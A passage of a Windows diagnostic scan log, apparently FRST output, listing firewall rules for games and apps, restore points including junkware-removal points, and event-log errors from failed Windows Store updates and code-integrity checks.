FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

12-02-2016 19:34:43 Windows Update
15-02-2016 13:41:32 Windows Backup
18-02-2016 15:21:16 Windows Update
21-02-2016 16:50:40 Windows Update
21-02-2016 19:00:07 Windows Backup
28-02-2016 19:00:09 Windows Backup
01-03-2016 12:19:24 Restore Point Created by FRST
01-03-2016 12:35:23 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:48:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:35:24 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (03/01/2016 12:52:06 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

Error: (03/01/2016 12:52:03 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

Error: (03/01/2016 12:51:58 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

Error: (03/01/2016 12:51:56 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.

Error: (03/01/2016 12:51:22 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

Error: (03/01/2016 12:51:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.

Error: (03/01/2016 12:51:10 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

Error: (03/01/2016 12:51:08 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.


CodeIntegrity:
===================================
Date: 2016-02-13 23:54:36.285
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.256
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.214
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.157
